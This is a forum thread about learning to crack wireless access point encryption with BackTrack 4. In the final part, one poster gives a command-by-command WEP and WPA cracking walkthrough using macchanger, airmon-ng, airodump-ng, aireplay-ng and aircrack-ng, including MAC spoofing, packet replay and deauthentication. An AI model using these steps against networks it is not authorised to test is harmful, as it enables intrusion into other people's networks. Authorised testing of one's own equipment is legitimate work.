Wireless Security

[Modify_inc]

Hey guys new here...
I'm interested in learning how to gain access to a secured wireless AP. I have seen some great guides on the web using BT 2 and 3 but nothing for version 4. I assumed their would be one listed in this forum here but cant seem to find anything. Can someone tell me if a BT 3 guides will work with BT 4. Ive read that BT 3 commands were very different from BT 2 and so am worried that BT 4 will be different than BT 3.

thanks

[Lincoln]

What type of AP is it?

[VoiceInTheDesert]

Search for a guy named Mushroomheadbanger on Youtube. He's got some pretty easy to follow guides on how to break WEP and WPA.

[Modify_inc]

I have a LevelOne router that I will be testing it on. I'm just trying to find a guide like the ones I have seen for BackTrack 2 and 3. I will be glad to follow the version 3 that I found on the internet if anyone here can confirm it will work. I would give you the link to the guide I found but dont believe posting links is acceptable.

[Snayler]

What the...? You really want someone to answer that?

Next time, don't ask if it WILL work. Test first, and if something doesn't work, search for a solution, and ONLY after you've done lots and lots of searching, if you still can't find a solution, try and get help here.

Try harder.

[Modify_inc]

What the...? You really want someone to answer that?

Next time, don't ask if it WILL work. Test first, and if something doesn't work, search for a solution, and ONLY after you've done lots and lots of searching, if you still can't find a solution, try and get help here.

Try harder.

are you kidding me you act like I wanted to be spoon fed or something. This forum offers many How To's yet I didn't see one listed for wireless security cracking. I was only asking if there is a guide or how to so I can get started with "Trying Harder" to learn where to get started. I have already read guides for BackTrack 2 and 3, and now 4 is out and I was curious if there was a guide for the 4th verison. I've read the BT 4 does use a new kernal and commands so I can't see how version 3's guide with all it's specfic commands will work with using BT 4. I'll just keep looking for a guide, I'm bound to find one. Just thought the site that offers the software would have a "How To".

I don't guess you would know why this forum doesn't offer a How To for this task would you?

Mike

Search for a guy named Mushroomheadbanger on Youtube. He's got some pretty easy to follow guides on how to break WEP and WPA.

Thanks I will check into that.

[lupin]

Alright, settle down people.

@Modify_inc , many of the various attack tools on BackTrack 3 and 4 will work in similar ways because they generally differ in version number only (with the tools in BT4 being more recent), and in addition, many of the tools from BT3 made it into 4. The differences between the BackTrack versions are more in the area of the base distribution, the packaging system and the repository, so its quite likely that tutorials on Wireless Cracking written for BT3 will still work in BT4 as long as the required tool is still present.

My advice is to give it a go and see.

[Archangel-Amael]

I don't guess you would know why this forum doesn't offer a How To for this task would you?
Mike

Because no one has made a comprehensive (good quality) guide.
Not to mention everyone and their dog has a made a wep cracking video, and it's really not cool.
Now if you can get it done using an install of BT4 on a dead badger. Then my friend you have done something kewl.

[pentest09]

Hi fellaz,

For those in need of simple wep wpa tuts try this:

First steps for usb in vmware:

Please note not expert but tried all sorts of ways to do this
and this is by far the easiest and reliable. for me anyway..

#= commands to use

Vmware:

Boot up

insert wifi card

check vm removable devices for card

#lsusb to see if card is on system

#iwconfig to check cards interface name ie. wlan0 or ra0 rausb0

#macchanger 00:11:22:33:44:55 (ie.)wlan0

Put card into monitor mode to capture packets or "info":

#airmon-ng start wlan0


#airodump-ng wlan0

find a you specific network and copy the bssid mac address
then use the following commands and repalce the mac address where it says:

#airodump-ng wlan0 -c(channel) -w (capture) --bssid (ap mac add) wlan0

Then follow the following based on your type of encryption.in separate windows


-----------------------------------------------------------------------------------------------
WEP ATTACK:

1: #aireplay-ng -1 0 -a (ap mac add) -h 00:11:22:33:44:55 wlan0 (to associate)

2: #aireplay-ng -3 -b (ap mac add) -h 00:11:22:33:44:55 wlan0 (to replay packets injected)

and wait for the arp reply and boom you should see the date column in airodump-ng shoot up
wait till u got about 5000 ivs which is the data you need to unencrypt the key and then
in a new window:
3: #aircrack-ng capture*.cap (the * is the wildcard to use all capture files save you looking for
specific one if you do a lot of scans.

then wait ...............you should see a network list pick you number and then it will start to
crack it if it says not enough ivs dont worry leave it running it will carry on once you got
10,000 and start to crack until it works usaually takes me about 3-4 mins with good enuff signal.


-----------------------------------------------------------------------------------------------
WPA ATTACK:

deauth for client (wait for handshake)
#aireplay-ng -1 10 -a (apmac) -c (client Mac) wlan0

-----------------------------------------------------------------------------------------------

aircrack-ng capture*.cap


------------------------------------------------------------------------------------------------



Hope this Helps. Please note: you could have mac filtering problems but there are ways to clone etc

All info for pentest purposes and not nicking you streets wifi , ILLEGAL.........ILLEGAL....

Dee

[calico]

"macchanger 00:11:22:33:44:55 (ie.)wla0

if nothing illegal why all the extra steps mac changing and all? seems like a lot of exrta typing just to see if something would wok not to mention the fact that is your ap.